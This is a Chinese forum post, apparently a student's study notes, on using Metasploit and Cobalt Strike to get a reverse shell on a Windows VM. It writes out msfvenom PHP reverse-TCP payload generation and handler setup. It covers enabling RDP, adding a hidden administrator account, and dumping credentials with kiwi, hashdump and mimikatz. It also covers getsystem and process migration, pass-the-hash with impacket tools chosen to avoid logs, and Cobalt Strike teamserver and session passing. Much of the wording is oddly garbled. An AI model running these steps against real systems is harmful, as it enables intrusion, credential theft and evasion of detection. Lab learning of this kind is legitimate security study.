msf和cs的利用及实现回弹体系权限的总结

打印 上一主题 下一主题

主题 1043|帖子 1043|积分 3129

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?立即注册

x
目次
实现回弹体系权限
基本配置
第一种方法新建一个用户去登入
Msfconsole的功能
第二种方法就是直接去拿到管理员的账号的密码
存在的问题
解决办法
CS
Cs与Msf联动


实现回弹体系权限

基本配置

sfvnom --list payload查看php 的payload怎么天生的(这个不怎么稳固)

Msfvenom -p php/meterpreter/reverse_tcp LHOST=(本身的ip地址) LPORT=12345(这个是端口号) -o sherrre.php(这个是最终输出的php文件)

Cat sherrre.php 查看这个php文件可以看出,它实际上是写了一个php的代码,它是将权限回弹到这个本身的ip地址那去了

Python3 -m http.server 9999用python搭建一个简朴的web服务器

登入上去,把刚天生的文件sherrre.php下到桌面上面去,
然后把它上传到另一个虚拟机体系上面去。

上传乐成后,就点击去访问它(上欣赏器上去访问)

然后回到keil的上面去回联,由于从虚拟机上面反弹给你你就必要监听
Msfconsole
Use exploit/multi/handler
Set payload php/meterpreter/reverse_tcp//这个是反弹型木马,是受害者去自动接洽攻击者
Set lhost (keil也就是本地的ip地址)
Set lport 12345(毗连端口)
只要有一个回弹的权限就可以监听到(无法就是控制对方的电脑和网站,这个在antsword也可以做的)
它把你的木马弹返来后,接收到然后继续控制。


这个如果控制的Windows那么利用
Getuid是查看用户
命令:Shell进入Windows的窗口下看一下
利用命令:net user 可以查看权限
查看IEUser的权限

然后想去远程登入端口
首先查看想登入的电脑登入端口3389(Windows)是否打开,可能得到的权限不太够
命令:Exit,退出Windows的窗口
Msf post模块开启Windows远程毗连3389端口:命令:run post/windows/manage/enable_rdp

然后在进Windows窗口,查看3389端口是否开放



两个方法去登入,直接用管理员去登入,然后另有新建一个用户去登入。
第一种方法新建一个用户去登入

提权
先创建用户放在管理员组去:
命令:Shell,先进去Windows窗口
命令:Net user (名字name) (密码password) /add


瞥见它在user组下

命令:Net localgroup Adminnistrators  (名字name) 添加到管理员组去
然后退出Windows界面

明显添加乐成了,
然后再主Windows(也就是本身的电脑)上面去利用远程桌面毗连这个应用(输入虚拟机Windows的ip地址,登入本身创建的账号)

Msfconsole的功能


Exploit是漏洞利用程序,Auxiliary是辅助利用程序(前渗出模块,也是还没做,就像是一个哨兵去探查能不能入侵),post是后渗出模块(也就是将权限拿下来了,想要去做进一步的操作,比方远程毗连提权等)


Exploit是利用程序

Auxiliary是辅助程序,就是探测里面有没有永恒之蓝这个程序


但是现如今:添加用户是不可取的,由于很容易被发现
命令:Shell,进去Windows界面
去把刚才创建的用户删掉
命令:Net user (用户) /del

第二种方法就是直接去拿到管理员的账号的密码

退出Windows界面
命令:Load kiwi
这个是去抓取Windows体系下的明文密码的
实在密文也可以抓,命令:Hashdump

输入crede_all是获取账户和密码
失败的原因是权限太低了,是管理员组但是不是最高权限。
在Windows下最高权限是system,linux下最高权限是root
然后就必要去提权
命令:Getsystem
这个就是用一个0day天生了一个esep文件自动上传提权,乐成就乐成失败就失败

命令:Getuid查看用户权限
存在的问题

但是依然存在问题

然后发现user依然是IEUser,权限不够(这里必要提醒一哈,Windows的最高权限是system)

必要把进程迁移到system上面去(也就是进程号)
命令:Mrgrate 14232(这个是进程号)

发现依然没抓到(这里可能是版本的问题,版本太新了也有可能)

先进入mimikate.exe这个模式下
Privilege::debug先把权限加载起来
然后去拿密码

发现拿到的是密文,这怎么办?
解决办法


  • 直接拿密文hash值登入
Windows接收账号密码的地方实在是由于程序Winlogon,这程序会担当到账号密码,它会发送给一个进程lsass,会将密码留存一份存在内存中,然后还会加密一份存储在SAM(相称于数据库)下。
然后进去kali中,提供了一种工具impacket

这个目次下面呢,有几个py文件,专注与渗出的
这里面有一个psexec.py,它不必要密码只必要LMhash:NThash值,实在LMhash太弱了就没啥用,如今LMhash前面的内容都是一样的,以是任意写一个都是可以的由于没用这个。
用这个命名:(谁人名字@ip地址是虚拟机Windows)

实在不推荐用它,由于会纪录日志。
推荐smbexec.py和wmiexec.py,由于不会纪录日志
CS

在keli先进去cs目次
Cd /cs/Server
无非就是client去拿到server(在公网)上的数据去共享
必要个毗连密码//实验权限
./teamserver IP(本身的ip地址) password(启动密码)
进去客户端
Cd ./cs/Client
./cobaltstrike-client.sh//这一步记得在kail虚拟机里面做有图形化界面(本身的接口ip和启动密码)

设置监听器

Payload
不带less的就是全功能
带less是一个下载器,会从服务端下载下来

要让他中马,就要将这个木马拿下来,以是启动虚拟机上面去,然后启动

这里面另有很多功能:代理、相互通报的功能

Cs与Msf联动

Span是相互通报的功能,你把你的shell通报给msf,msf把shell通报给你
命令:Msfconsole
Use exploit/multi/handler
Set payload php/meterpreter/reverse_http//这个是反弹型木马,是受害者去自动接洽攻击者,这里是http是由于cs我们的就是http
Set lhonst 本身的ip地址
Set lport 1234(端口)
Exploit
它就监听在这里了
然后就要用cs进行通报了,进行会话通报包管ip和端口号与ME中设置的同等



这里是Cs直接通报给msf。也就是说msf里面有些功能好用就把功能通报给cs,cs面有些功能好用就把功能通报给msf也就是把(shell)相互通报了一下。








免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

去皮卡多

论坛元老
这个人很懒什么都没写!
快速回复 返回顶部 返回列表